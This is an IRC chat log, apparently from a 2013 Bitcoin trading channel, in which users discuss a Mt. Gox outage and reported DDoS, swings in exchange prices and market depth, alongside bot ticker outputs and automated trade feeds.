lag. Try again later. Apr 03 17:06:18 ;;ticker Apr 03 17:06:18 Error: Failure to retrieve ticker. Try again later. Apr 03 17:06:19 needs recursion Apr 03 17:06:25 45 minutes laaaag Apr 03 17:06:36 wtf Apr 03 17:07:10 mtgox ddos Apr 03 17:07:23 ddos of buyers Apr 03 17:07:45 btc-e also ddos Apr 03 17:07:57 campbx up Apr 03 17:08:01 yes but that's every day for btc-e Apr 03 17:08:05 selling at 140 Apr 03 17:13:00 [HAVELOCK] [HIM] 1 @ 1.91 BTC [-] Apr 03 17:14:00 [HAVELOCK] [VTX] 5 @ 0.4 = 2 BTC [-] Apr 03 17:17:18 mtgox is awesome sometimes Apr 03 17:17:52 so do we have any updates or anything Apr 03 17:18:01 [HAVELOCK] [HIM] 1 @ 1.8799 BTC [-] Apr 03 17:18:05 check the tweeter Apr 03 17:18:14 ? Apr 03 17:18:17 ;;ticker Apr 03 17:18:18 Error: Failure to retrieve ticker. Try again later. Apr 03 17:19:07 <[\\\]> ThickAsThieves: coming soon Apr 03 17:19:27 <[\\\]> in other news, bfl shipping soon Apr 03 17:20:08 <[\\\]> ;;genrate 1000 Apr 03 17:20:09 The expected generation output, at 1000.0 Mhps, given difficulty of 6695826.2826, is 0.0751074617539 BTC per day and 0.00312947757308 BTC per hour. Apr 03 17:20:29 yes please ship this minirig i preorder for 5000btc in august Apr 03 17:20:31 why do i have to auth zendesk to click twitter links now? Apr 03 17:20:39 ;;genrate 3000 Apr 03 17:20:40 The expected generation output, at 3000.0 Mhps, given difficulty of 6695826.2826, is 0.225322385262 BTC per day and 0.00938843271924 BTC per hour. Apr 03 17:20:44 killing it Apr 03 17:20:46 <[\\\]> lol error4733 Apr 03 17:20:59 <[\\\]> ;;genrate 1500000 Apr 03 17:21:00 The expected generation output, at 1500000.0 Mhps, given difficulty of 6695826.2826, is 112.661192631 BTC per day and 4.69421635962 BTC per hour. Apr 03 17:21:04 ;;calc 5000*141 Apr 03 17:21:04 705000 Apr 03 17:21:14 funny that gox wants to add litecoin Apr 03 17:21:19 cant even handle bitcoin Apr 03 17:21:21 [\\\] lend me your hashes for a day Apr 03 17:21:25 whenever you are caught up Apr 03 17:21:29 just a day Apr 03 17:21:52 and by lend i mean gift Apr 03 17:21:52 <[\\\]> you can borrow them for .08/GH/Day Apr 03 17:22:01 [HAVELOCK] [HIM] 1 @ 1.8794 BTC [-] Apr 03 17:22:02 [HAVELOCK] [HIM] 4 @ 1.879 = 7.516 BTC [-] Apr 03 17:22:10 i'm confused but i agree Apr 03 17:22:32 <[\\\]> Send me 8BTC and I'll throw 100GH your way Apr 03 17:22:34 this will end badly Apr 03 17:22:49 for how long? Apr 03 17:23:12 <[\\\]> an hour or 24 Apr 03 17:23:12 ;;genrate 100000 Apr 03 17:23:14 The expected generation output, at 100000.0 Mhps, given difficulty of 6695826.2826, is 7.51074617539 BTC per day and 0.312947757308 BTC per hour. Apr 03 17:23:18 ;;ticker Apr 03 17:23:22 that's no good Apr 03 17:23:23 nopesy Apr 03 17:23:33 Error: Failure to retrieve ticker. Try again later. Apr 03 17:23:55 how about 4BTC instead Apr 03 17:23:58 i have 4BTC Apr 03 17:24:15 <[\\\]> why would I use hashes for half price? Apr 03 17:24:24 lol Apr 03 17:24:24 friendship Apr 03 17:24:26 lolololol Apr 03 17:24:27 rainbows Apr 03 17:24:34 also unicorns Apr 03 17:24:52 oh man HIM is plummeting Apr 03 17:24:56 !ticker H HIM Apr 03 17:24:58 [HAVELOCK:HIM] 1D: 1.87900000 / 1.95542273 / 2.04400000 (22 shares, 43.01930000 BTC), 7D: 1.80000000 / 1.92511728 / 2.08000000 (162 shares, 311.86899996 BTC), 30D: 1.40001001 / 1.80131545 / 2.08000000 (735 shares, 1323.96685265 BTC) Apr 03 17:25:18 <[\\\]> jcpham: https://sphotos-b.xx.fbcdn.net/hphotos-ash4/484376_10200293317748968_1988410100_n.jpg Apr 03 17:25:38 i would eat that unicorn poop Apr 03 17:25:42 ;goxlag Apr 03 17:25:52 ;;goxlag Apr 03 17:26:02 Error: Problem retrieving gox lag. Try again later. Apr 03 17:26:10 yeeeah Apr 03 17:26:15 wow gox has turned off all external apis Apr 03 17:26:23 anyone know whats up? Apr 03 17:26:36 gox isn't accepting API requests Apr 03 17:26:49 not just external api's. The mtgox website shows the same USD price for the past hour Apr 03 17:26:53 RIP BITCOIN 4.3.2013 Apr 03 17:27:00 [HAVELOCK] [HIM] 1 @ 1.879 BTC [-] Apr 03 17:27:14 we hardley knew ye Apr 03 17:27:15 question is, will it fo up or down after gox is back Apr 03 17:27:18 go* Apr 03 17:27:21 down Apr 03 17:27:32 guys just remember the bitcoin isn't rocketing up Apr 03 17:27:40 the currency used to purchase it is rocketing down Apr 03 17:27:45 maybe 40 dollars it will go down Apr 03 17:27:49 ;;market --sell Apr 03 17:27:49 (market sell [--usd] ) -- Calculate the effect on the market depth of a market sell order of bitcoins. If '--usd' option is given, denotes the size of the order in USD. Apr 03 17:27:50 its correcting to the proper level Apr 03 17:28:02 still 135$ on BTC E Apr 03 17:28:08 we really should use "the bitcoin" instead of "bitcoin". definitely love seeing the news heads on tv say "the bitcoin" Apr 03 17:28:10 ;;market sell 10000 Apr 03 17:28:13 A market order to sell 10000 bitcoins right now would net 1286684.1179 USD and would take the last price down to 116.2000 USD, resulting in an average price of 128.6684 USD/BTC. | Data vintage: 0.0009 seconds Apr 03 17:28:25 ;;market sell 100000 Apr 03 17:28:26 A market order to sell 100000 bitcoins right now would net 8014161.6596 USD and would take the last price down to 35.6000 USD, resulting in an average price of 80.1416 USD/BTC. | Data vintage: 12.6226 seconds Apr 03 17:28:39 Wouldn't take much at all Apr 03 17:28:45 maybe think of it this way, btc has been going up for a while, it needs to seek some sort of value where it reaches a plateau of ups and downs Apr 03 17:28:53 its seeking that value still Apr 03 17:29:11 well gox is going to cause the price run real quick Apr 03 17:31:20 if you could sell at 140 now would you? Apr 03 17:31:20 "Database access error, please retry later" Apr 03 17:31:36 i sell at all price points as it moves in and out Apr 03 17:31:48 keep coffers even Apr 03 17:31:59 sold 5% at 140 this morn. Apr 03 17:32:34 i'm gonna sell a lil Apr 03 17:32:50 is there an irc room for mtgox around? Apr 03 17:32:57 #mtgox Apr 03 17:32:58 I think coinbas is trying to buy up coins Apr 03 17:33:04 ThickAsThieves: its closed Apr 03 17:33:08 bitcoinity has gold charts? Apr 03 17:33:08 oh Apr 03 17:33:09 https://bitcoinity.org/charts/gold Apr 03 17:35:06 check it out Apr 03 17:35:11 woowoowoowoo Apr 03 17:35:12 I love that everything is down but mpoebot Apr 03 17:35:24 if you guys have calls I'd sell them Apr 03 17:35:25 lol Apr 03 17:35:41 whyy?? Apr 03 17:35:44 we can't sell them Apr 03 17:35:48 bot is up Apr 03 17:35:50 $avg Apr 03 17:35:52 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 03 17:36:01 using what price? Apr 03 17:36:03 oh shit Apr 03 17:36:14 bot is mispricing Apr 03 17:36:34 sell now! Apr 03 17:36:35 lol Apr 03 17:36:48 doesn't seem like it's mispricing to me? Apr 03 17:37:02 oh nevermind Apr 03 17:37:07 what is the last price anyway? Apr 03 17:37:08 looking at the wrong strike Apr 03 17:37:10 lolol Apr 03 17:37:23 like 35$ ? Apr 03 17:37:27 I see 124.41 on bitcoincharts.com, but that's the 24h Apr 03 17:37:34 ah ok Apr 03 17:38:04 was there a massive selloff or wtf happend anyway? Apr 03 17:38:07 mircea_popescu: there is listtransactions with since parameter now Apr 03 17:38:41 my guess, is that gox couldnt keep up with deposits of any kind, so price went up Apr 03 17:38:44 although still pretty hairy Apr 03 17:39:26 and what heppened with gox? bitcoinity shows no heartbeat Apr 03 17:40:07 my guess, is they are offline trying to catch up, and wont come back til they are comfortable Apr 03 17:40:57 gox is dead. Apr 03 17:41:02 "please wait a bit" lol Apr 03 17:41:05 MagicalTux says the DDos only brought it down for a second, but it's down now because people keep trying to ping it. Apr 03 17:41:31 Yeah keep pressing reload everyone, that'll help... Apr 03 17:41:48 should got cloudflare1 Apr 03 17:41:52 hehe Apr 03 17:41:59 i guess this is like tripping a special kid at the olympics eh mircea_popescu ? Apr 03 17:42:12 tripping a kid at the special olympics* Apr 03 17:42:26 [10:39] <@MagicalTux> actually system went down only for a short time, right now it's kept down by all the people trying to access anyway Apr 03 17:42:47 thestringpuller: my BS detector is redlining atm Apr 03 17:43:02 ^ Apr 03 17:43:25 ;;tslb Apr 03 17:43:27 MtGox isn't "special"? Apr 03 17:43:28 Time since last block: 10 minutes and 1 second Apr 03 17:43:35 it just reads to me like "we dunno wtf is going on and have no clue that we don't know" Apr 03 17:43:37 bitbet is too cheap; https://bitcointalk.org/index.php?topic=141458.msg1731120#msg1731120 Apr 03 17:43:40 ;;estimate Apr 03 17:43:40 Next difficulty estimate | 7780288.78529 based on data since last change | 8775595.58404 based on data for last three days Apr 03 17:43:48 and cloudflare won't help when 100k real ppl with real browser pound something Apr 03 17:44:01 LOL Apr 03 17:44:30 i kid Apr 03 17:44:33 Someone tried to sell a Black Lotus, Alpha edition card. Demand crashed Mt. Gox Apr 03 17:44:39 jurov: that, heh. Scaling is a bitch :P Apr 03 17:45:13 Bugpowder: lold Apr 03 17:45:40 keith_hanson you the guy with the radio show ? Apr 03 17:46:14 mircea_popescu: I have no radio show, ha Apr 03 17:46:35 r u teh guy with the pedobusting show? Apr 03 17:47:08 Bugpowder: You may have me confused with another person, heh Apr 03 17:47:17 yeah. with... keith... hanson :D Apr 03 17:48:27 Wow. That sucks. I need to SEO my name or something :P Apr 03 17:48:34 http://www.keithontheair.com/ << for the record Apr 03 17:48:39 nice webskills on display Apr 03 17:48:44 yeah. I see that haha Apr 03 17:49:14 gox down? Apr 03 17:49:47 derp mode Apr 03 17:50:50 EVERYBODY WAS KUNG-FU FIGHTING ... THOSE CATS WERE FAST AS LIGHTNING Apr 03 17:50:54 ;;ticker Apr 03 17:51:01 [HAVELOCK] [HIM] 1 @ 1.87 BTC [-] Apr 03 17:51:04 BTCUSD ticker | Best bid: 141.32000, Best ask: 141.32001, Bid-ask spread: 0.00001, Last trade: 141.32001, 24 hour volume: 123106.83272605, 24 hour low: 106.95100, 24 hour high: 147.00000, 24 hour vwap: 123.99916 Apr 03 17:51:08 back? Apr 03 17:52:02 [MPEX] [S.MPOE] 850 @ 0.00069537 = 0.5911 BTC [+] Apr 03 17:52:04 [MPEX] [S.MPOE] 10500 @ 0.00069692 = 7.3177 BTC [+] Apr 03 17:52:06 [MPEX] [S.MPOE] 5500 @ 0.00069822 = 3.8402 BTC [+] Apr 03 17:52:21 [MPEX] [S.MPOE] 6700 @ 0.00069999 = 4.6899 BTC [+] Apr 03 17:52:42 ;;goxlag Apr 03 17:52:42 MtGox lag is 6048.679827 seconds. During this time, light travels 12.1214866489 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 03 17:52:50 ha Apr 03 17:52:52 $goxlag --au Apr 03 17:53:00 oh Apr 03 17:53:06 u beat me to it Apr 03 17:53:43 I dopm' Apr 03 17:53:45 http://bitcoinity.org/markets Apr 03 17:53:46 SOMEONE SET US UP THE BOMB Apr 03 17:53:48 flatline looks cute. Apr 03 17:53:49 don't think you need the --au anymore. Apr 03 17:54:14 $mpexlag Apr 03 17:54:16 mircea_popescu: 0.111227035522 seconds Apr 03 17:54:26 :] Apr 03 17:54:35 now would be a great time to troll tux in #mtgox. Apr 03 17:54:39 re mpexlag Apr 03 17:54:54 heh. Apr 03 17:55:23 $avg Apr 03 17:55:25 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 03 17:56:00 !baselag Apr 03 17:56:02 6 weeks. Apr 03 17:57:24 was there a massive selloff or wtf happend anyway? < http://polimedia.us/dtng/c/src/136498390721.png Apr 03 17:57:28 then it just went to shit from there. Apr 03 17:57:40 and to think yesterday i mentioned goxlax all the way to Eris... Apr 03 17:58:35 this kinda works Apr 03 17:58:36 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Apr 03 17:59:16 bitstamp flying blind Apr 03 17:59:23 of course after that graph, btc rallied back to 140/141 area, and then mtgox shit the bed Apr 03 17:59:27 is this for real? https://campbx.com/images/bxdaily.jpg Apr 03 17:59:31 or a troll Apr 03 18:00:35 ;;tslb Apr 03 18:00:38 Time since last block: 3 minutes and 34 seconds Apr 03 18:01:11 ;;goxlag Apr 03 18:01:12 MtGox lag is 6145.968388 seconds. During this time, light travels 12.3164518359 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 03 18:01:31 heh https://twitter.com/MtGox lag my ass Apr 03 18:01:46 that's their fail whale Apr 03 18:03:07 ;;goxlag Apr 03 18:03:07 MtGox lag is 5455.751923 seconds. During this time, light travels 10.933265768 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 03 18:03:26 Scrat looks to me like one of those $50 pci autotesting packages most hosts will do Apr 03 18:03:49 bgupta exactly Apr 03 18:03:49 90 mins Apr 03 18:04:03 http://bitcoincharts.com/charts/ still down also Apr 03 18:04:18 no wait, up nao Apr 03 18:04:26 slowish Apr 03 18:04:54 flakey Apr 03 18:05:22 ;;ticker Apr 03 18:05:23 BTCUSD ticker | Best bid: 141.10000, Best ask: 141.69998, Bid-ask spread: 0.59998, Last trade: 141.69998, 24 hour volume: 123106.83272605, 24 hour low: 106.95100, 24 hour high: 147.00000, 24 hour vwap: 123.99916 Apr 03 18:05:34 ;;goxlag Apr 03 18:05:34 MtGox lag is 4538.34842 seconds. During this time, light travels 9.0947994198 AU. You could have sent a bitcoin from the Sun to Saturn (9.54 AU). Apr 03 18:06:43 omg can't wait, it's like chrismas Apr 03 18:06:48 BTC China @ $151.56 Apr 03 18:06:49 Bitfloor @ $145 Apr 03 18:06:49 Bitstamp @ 133.88 Apr 03 18:06:50 BTC-E @ $130.07 Apr 03 18:06:52 BTC 24 @ $152 Apr 03 18:06:57 90$ or 190$ ? Apr 03 18:07:02 about 130ish Apr 03 18:07:14 china will grow larger. Apr 03 18:07:21 The interesting thing I find is all these exchanges including mtgox, mpex, btct.co, bf, etc all trade 24x7, without so much as a daily hour of maintenance window. This I believe is unheard of in the finance world. (Certain things do trade like 23 hours a day but on rotating exchanges) Apr 03 18:07:22 lol gribble Apr 03 18:09:13 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [-] Apr 03 18:09:17 [BTCTC] [ASICMINER-PT] 1 @ 0.769 BTC [-] Apr 03 18:09:27 [BTCTC] [ASICMINER-PT] 8 @ 0.76802 = 6.1442 BTC [-] Apr 03 18:13:06 is this why mt gox is showing btc ~ $110 Apr 03 18:14:04 mircea_popescu worth 130 yet? Apr 03 18:14:43 bah my inner troll is strong sometimes. Apr 03 18:15:05 bgupta: what is there to perform maintenance on? this isnt 1980 Apr 03 18:15:46 goxlag almost caught up Apr 03 18:15:47 bgupta: oh, did you paste that? Apr 03 18:15:51 ;;goxlag Apr 03 18:15:51 MtGox lag is 1102.961906 seconds. During this time, light travels 2.21032331025 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 03 18:16:37 mircea_popescu: that shit is plastered all over their mainpage like it's an achievement Apr 03 18:18:01 [HAVELOCK] [VTX] 10 @ 0.38 = 3.8 BTC [-] Apr 03 18:21:57 ;;ticker Apr 03 18:21:58 BTCUSD ticker | Best bid: 136.27101, Best ask: 140.00000, Bid-ask spread: 3.72899, Last trade: 140.00000, 24 hour volume: 118334.05152003, 24 hour low: 107.07900, 24 hour high: 147.00000, 24 hour vwap: 124.83808 Apr 03 18:24:02 if anyone gets an AM dividend please let me know how much it is this week. thanks Apr 03 18:24:12 ;;goxlag Apr 03 18:24:13 MtGox lag is 912.746648 seconds. During this time, light travels 1.82913406297 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 03 18:24:35 hmm Apr 03 18:25:03 when ticker is used for quote /trade information which exchange does that come from Apr 03 18:25:33 lemme tell you guys Apr 03 18:25:40 online resumes are the way to do it Apr 03 18:26:14 wget -O resume.html http://fuckyourresume.com/ Apr 03 18:26:41 resumes are bullshit Apr 03 18:26:48 almost down to earth.. Apr 03 18:26:53 ./wkhtmltopdf-i386 ../Documents/resume.html ..Documents/resume.pdf Apr 03 18:26:59 i just turned it into a science Apr 03 18:27:20 now al i have to do i edit my blogity blog Apr 03 18:27:44 ./mailresume Apr 03 18:28:00 so that was fun. i'm changing employers Apr 03 18:29:40 ;;goxlag Apr 03 18:29:40 MtGox lag is 1132.059669 seconds. During this time, light travels 2.2686349015 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 03 18:30:34 ;;ticker Apr 03 18:30:36 BTCUSD ticker | Best bid: 136.27101, Best ask: 137.00000, Bid-ask spread: 0.72899, Last trade: 137.00000, 24 hour volume: 118334.05152003, 24 hour low: 107.07900, 24 hour high: 147.00000, 24 hour vwap: 124.83808 Apr 03 18:31:10 Scrat what shit you mean ? Apr 03 18:31:36 this one is still kickin Apr 03 18:31:37 Bruce Wagner Apr 02 05:08PM -0400 Apr 03 18:31:37 Just as I predicted. :-) Apr 03 18:31:37 Bitcoin hit $116 so far today. Apr 03 18:31:53 -- Apr 03 18:31:55 bruce wagner is predicting now ?! Apr 03 18:31:58 he predicted it. Apr 03 18:32:05 yea Apr 03 18:32:22 ;;p Apr 03 18:32:22 Error: "p" is not a valid command. Apr 03 18:32:43 ;;ticker Apr 03 18:32:43 BTCUSD ticker | Best bid: 137.88344, Best ask: 139.00000, Bid-ask spread: 1.11656, Last trade: 137.88344, 24 hour volume: 118334.05152003, 24 hour low: 107.07900, 24 hour high: 147.00000, 24 hour vwap: 124.83808 Apr 03 18:33:13 ;;bids 89 Apr 03 18:33:15 ;;bids 80 Apr 03 18:33:16 There are currently 30446.462 bitcoins demanded at or over 89.0 USD, worth 3226430.31489 USD in total. | Data vintage: 0.0114 seconds Apr 03 18:33:16 There are currently 39721.986 bitcoins demanded at or over 80.0 USD, worth 4008857.00483 USD in total. | Data vintage: 0.0183 seconds Apr 03 18:33:24 ;;asks 140 Apr 03 18:33:24 There are currently 215.97452 bitcoins offered at or under 140.0 USD, worth 30131.2587319 USD in total. | Data vintage: 8.3583 seconds Apr 03 18:34:21 ;;asks 200 Apr 03 18:34:21 There are currently 19840.446 bitcoins offered at or under 200.0 USD, worth 3184847.51314 USD in total. | Data vintage: 65.2698 seconds Apr 03 18:35:16 ;;asks 160 Apr 03 18:35:18 There are currently 13118.235 bitcoins offered at or under 160.0 USD, worth 1938768.98293 USD in total. | Data vintage: 0.0026 seconds Apr 03 18:35:21 [MPEX] [O.USD.C098T] 1000 @ 0.24108289 = 241.0829 BTC [+] Apr 03 18:35:51 [MPEX] [O.USD.C089T] 120 @ 0.28897825 = 34.6774 BTC [+] Apr 03 18:35:53 [MPEX] [O.USD.C092T] 1000 @ 0.2653217 = 265.3217 BTC [-] Apr 03 18:35:58 [MPEX] [O.USD.C095T] 1000 @ 0.25297192 = 252.9719 BTC [-] Apr 03 18:36:14 wow. Apr 03 18:36:18 shorting teh calls? Apr 03 18:36:24 let me buy from u bro Apr 03 18:36:35 methinks more like closing out Apr 03 18:37:01 ah, yes. Apr 03 18:37:02 obv Apr 03 18:37:20 [MPEX] [O.USD.C098T] 1000 @ 0.24118333 = 241.1833 BTC [+] Apr 03 18:37:27 but the rally is back on Apr 03 18:37:41 do we know that yet? Apr 03 18:37:44 ;;goxlag Apr 03 18:37:45 MtGox lag is 1150.999865 seconds. During this time, light travels 2.30659084222 AU. You could have sent a bitcoin from the Sun to Ceres (in the main asteroid belt) (2.77 AU). Apr 03 18:37:55 only 2 million usd to 160 and 10000 plus accounts on gox trying to get verified Apr 03 18:37:56 fucking insane Apr 03 18:37:57 hardly. about 137 atm Apr 03 18:38:14 ;;market sell 1000 Apr 03 18:38:17 A market order to sell 1000 bitcoins right now would net 132449.7782 USD and would take the last price down to 130.0000 USD, resulting in an average price of 132.4498 USD/BTC. | Data vintage: 0.0003 seconds Apr 03 18:38:25 ;;market sell 4000 Apr 03 18:38:25 A market order to sell 4000 bitcoins right now would net 510010.3348 USD and would take the last price down to 122.1000 USD, resulting in an average price of 127.5026 USD/BTC. | Data vintage: 8.5979 seconds Apr 03 18:38:34 http://bitcoinity.org/markets the market depth on that 0.o Apr 03 18:38:39 tanking Apr 03 18:38:41 the price could easily plummet Apr 03 18:38:47 ;;ticker Apr 03 18:38:48 BTCUSD ticker | Best bid: 133.00000, Best ask: 134.90730, Bid-ask spread: 1.90730, Last trade: 134.90730, 24 hour volume: 118334.05152003, 24 hour low: 107.07900, 24 hour high: 147.00000, 24 hour vwap: 124.83808 Apr 03 18:38:48 ;;bids 0 Apr 03 18:38:49 There are currently 40659320 bitcoins demanded at or over 0.0 USD, worth 8820891.03181 USD in total. | Data vintage: 32.0256 seconds Apr 03 18:39:18 This data lull felt like that moment in a movie car crash where everything goes slo-mo. Waaaaiiiittttt, whhhhhuttttt? Apr 03 18:39:29 not over yet Apr 03 18:39:37 *feels Apr 03 18:39:47 gox time Apr 03 18:39:54 Stay on target... stay on target! Apr 03 18:39:59 yeah still waiting for my deposit to clear Apr 03 18:40:06 36 confirms Apr 03 18:43:09 deposits seems cleared Apr 03 18:43:23 ;;goxlag Apr 03 18:43:23 MtGox lag is 786.528797 seconds. During this time, light travels 1.57619490277 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 03 18:43:45 FFS, why don't we just mail them letters with orders Apr 03 18:44:01 could have sent the order to mars lol Apr 03 18:44:02 jk Apr 03 18:44:07 wtf 8 point spread on gox!?! Apr 03 18:44:34 yeah, crazy this morning, you would see prints on both sides Apr 03 18:45:01 gox was frozen for a few hours, its still catching up Apr 03 18:45:08 or, trying to catch up Apr 03 18:45:09 it's embarassing for any bitcoin evangelist... Apr 03 18:45:40 ;;goxlag Apr 03 18:45:43 MtGox lag is 736.77759 seconds. During this time, light travels 1.47649404099 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 03 18:46:59 its possibly embarassing, but could also fuel the fire to newcomers "zomg everyone is clamoring to buy btc, fast fingers!" Apr 03 18:49:37 fat fingers, yea Apr 03 18:49:46 ;;seen smickles Apr 03 18:49:46 smickles was last seen in #bitcoin-assets 21 hours, 32 minutes, and 44 seconds ago: too many people keep trying to use it Apr 03 18:51:11 thats what makes it fun bgupta Apr 03 18:52:01 [MPEX] [O.USD.C188T] 57 @ 0.0866432 = 4.9387 BTC [+] Apr 03 18:52:23 someone is still optimistic Apr 03 18:52:52 $avg Apr 03 18:52:53 ThickAsThieves: 125.31 Apr 03 18:53:04 ;;seen smickles Apr 03 18:53:05 smickles was last seen in #bitcoin-assets 21 hours, 36 minutes, and 2 seconds ago: too many people keep trying to use it Apr 03 18:54:52 is this AM divs coming in? Apr 03 18:54:55 <[\\\]> asicminer div out Apr 03 18:54:55 pretty low Apr 03 18:54:56 <[\\\]> 0.00255553 Apr 03 18:54:58 0.00255553 Apr 03 18:55:00 heh Apr 03 18:55:03 <[\\\]> as expected Apr 03 18:57:23 [BTCTC] [ASICMINER-PT] 27 @ 0.7455 = 20.1285 BTC [-] Apr 03 18:57:26 [BTCTC] [ASICMINER-PT] 2 @ 0.745 = 1.49 BTC [-] Apr 03 18:57:28 [BTCTC] [ASICMINER-PT] 2 @ 0.745 = 1.49 BTC [-] Apr 03 18:57:31 [BTCTC] [ASICMINER-PT] 1 @ 0.7422 BTC [-] Apr 03 18:57:34 [BTCTC] [ASICMINER-PT] 1 @ 0.7421 BTC [-] Apr 03 18:57:36 [BTCTC] [ASICMINER-PT] 10 @ 0.74012 = 7.4012 BTC [-] Apr 03 18:57:39 [BTCTC] [ASICMINER-PT] 4 @ 0.74011 = 2.9604 BTC [-] Apr 03 18:57:51 <[\\\]> lol Apr 03 18:58:00 <[\\\]> asicminer crashing from the div? Apr 03 18:58:18 [BTCTC] [ASICMINER-PT] 5 @ 0.737 = 3.685 BTC [-] Apr 03 18:58:20 <[\\\]> its down a whole .0054~ Apr 03 18:58:24 [BTCTC] [ASICMINER-PT] 13 @ 0.7355 = 9.5615 BTC [-] Apr 03 18:58:25 <[\\\]> uh oh Apr 03 18:58:26 [BTCTC] [ASICMINER-PT] 2 @ 0.735 = 1.47 BTC [-] Apr 03 18:58:29 [BTCTC] [ASICMINER-PT] 1 @ 0.733001 BTC [-] Apr 03 18:58:32 [BTCTC] [ASICMINER-PT] 1 @ 0.7313 BTC [-] Apr 03 18:58:34 [BTCTC] [ASICMINER-PT] 1 @ 0.7301 BTC [-] Apr 03 18:59:14 [BTCTC] [ASICMINER-PT] 2 @ 0.715 = 1.43 BTC [-] Apr 03 19:00:37 <[\\\]> oh noes! Apr 03 19:01:01 [HAVELOCK] [SDICE] 6 @ 0.315 = 1.89 BTC [-] Apr 03 19:01:02 [HAVELOCK] [SDICE] 20 @ 0.3105 = 6.21 BTC [-] Apr 03 19:01:03 [HAVELOCK] [SDICE] 1 @ 0.31000001 BTC [-] Apr 03 19:01:04 [HAVELOCK] [SDICE] 1 @ 0.31 BTC [-] Apr 03 19:01:05 [HAVELOCK] [SDICE] 3 @ 0.3 = 0.9 BTC [-] Apr 03 19:01:14 <[\\\]> not dice too! Apr 03 19:01:23 <[\\\]> the end is near Apr 03 19:01:47 [BTCTC] [GSDPT] 276 @ 0.00362 = 0.9991 BTC [-] Apr 03 19:01:59 People cashing out? Apr 03 19:02:05 [BTCTC] [GSDPT] 3 @ 0.00361 = 0.0108 BTC [-] Apr 03 19:02:13 [BTCTC] [GSDPT] 80 @ 0.0036 = 0.288 BTC [-] Apr 03 19:02:21 [BTCTC] [GSDPT] 500 @ 0.00356 = 1.78 BTC [-] Apr 03 19:02:29 [BTCTC] [GSDPT] 10 @ 0.00355 = 0.0355 BTC [-] Apr 03 19:02:38 [BTCTC] [GSDPT] 54 @ 0.00352 = 0.1901 BTC [-] Apr 03 19:02:40 [BTCTC] [GSDPT] 500 @ 0.0041 = 2.05 BTC [+] Apr 03 19:02:54 [BTCTC] [GSDPT] 100 @ 0.003516 = 0.3516 BTC [-] Apr 03 19:02:59 [BTCTC] [GSDPT] 900 @ 0.003516 = 3.1644 BTC [-] Apr 03 19:03:44 it's embarassing for any bitcoin evangelist... << they're not here, blessfully. Apr 03 19:04:01 [HAVELOCK] [VTX] 13 @ 0.38 = 4.94 BTC [-] Apr 03 19:04:06 ;;ticker Apr 03 19:04:06 BTCUSD ticker | Best bid: 136.10000, Best ask: 136.45000, Bid-ask spread: 0.35000, Last trade: 136.45000, 24 hour volume: 118334.05152003, 24 hour low: 107.07900, 24 hour high: 147.00000, 24 hour vwap: 124.83808 Apr 03 19:04:42 http://siliconangle.com/blog/2013/03/29/this-week-in-ddos-cyberbunker-vs-spamhaus-mtgox-bitcoin-exchange-and-dwolla-sendgrid/ Apr 03 19:04:54 (old but interesting nonetheless) Apr 03 19:05:23 ;;ticker Apr 03 19:05:26 BTCUSD ticker | Best bid: 135.10000, Best ask: 136.45000, Bid-ask spread: 1.35000, Last trade: 136.45000, 24 hour volume: 118334.05152003, 24 hour low: 107.07900, 24 hour high: 147.00000, 24 hour vwap: 124.83808 Apr 03 19:07:05 lol shed a dollar in a minute Apr 03 19:07:19 [MPEX] [O.USD.C098T] 230 @ 0.24371748 = 56.055 BTC [+] Apr 03 19:07:31 [MPEX] [O.USD.C095T] 100 @ 0.25563121 = 25.5631 BTC [+] Apr 03 19:07:53 gox creditited me! Apr 03 19:08:03 <[\\\]> gee, this just screams stable: 24 hour low: 107.07900, 24 hour high: 147.00000 Apr 03 19:08:10 lol Apr 03 19:08:15 <[\\\]> 40% swing in a day Apr 03 19:08:21 <[\\\]> yeah, not a bubble Apr 03 19:08:26 <[\\\]> totally rational price appreciation Apr 03 19:08:27 [MPEX] [O.USD.C092T] 175 @ 0.27012732 = 47.2723 BTC [+] Apr 03 19:08:34 woohoo Apr 03 19:08:34 [\\\] actually i would say bubble averted. Apr 03 19:08:45 i see no bubbles here Apr 03 19:08:46 <[\\\]> mircea_popescu: its not popped yet :p Apr 03 19:08:53 yeh it is. Apr 03 19:08:56 <[\\\]> jcpham, shut yo face Apr 03 19:09:01 and the price started back on the rise... Apr 03 19:09:03 <[\\\]> ;;ticker Apr 03 19:09:04 >.> Apr 03 19:09:10 BTCUSD ticker | Best bid: 134.89949, Best ask: 136.45000, Bid-ask spread: 1.55051, Last trade: 134.89949, 24 hour volume: 122225.75654344, 24 hour low: 107.75000, 24 hour high: 147.00000, 24 hour vwap: 125.57761 Apr 03 19:09:14 We're gonna be at 500 USD/BTC within a week. Apr 03 19:09:19 <[\\\]> heh Apr 03 19:09:23 not happenin'. Apr 03 19:10:02 and in two weeks, at 10000 USD/BTC Apr 03 19:10:06 >.> Apr 03 19:10:11 <[\\\]> and in 3 weeks $.20 Apr 03 19:10:14 Hey Namworld & Jurov don't forget my transfer plz! Apr 03 19:10:15 ;;bids 0 Apr 03 19:10:18 There are currently 30825532 bitcoins demanded at or over 0.0 USD, worth 8940110.86194 USD in total. | Data vintage: 0.0106 seconds Apr 03 19:10:23 uh ohes Apr 03 19:10:26 Is jurov around? Apr 03 19:10:35 he was :/ Apr 03 19:10:39 <[\\\]> still only 9M Apr 03 19:10:41 not anymore Apr 03 19:10:41 damn Apr 03 19:10:45 hehe Apr 03 19:10:54 the wall at 90 got taken down Apr 03 19:10:55 <[\\\]> I love how people mention billion dollar market cap Apr 03 19:11:00 <[\\\]> but only 9M of depth Apr 03 19:11:06 <[\\\]> they forget to mention the second bit Apr 03 19:11:18 [\\\] because iot's not really notable. Apr 03 19:11:21 In 3 weeks... well we can't reach in 3 weeks because the price can't go there. It reaches upward to the 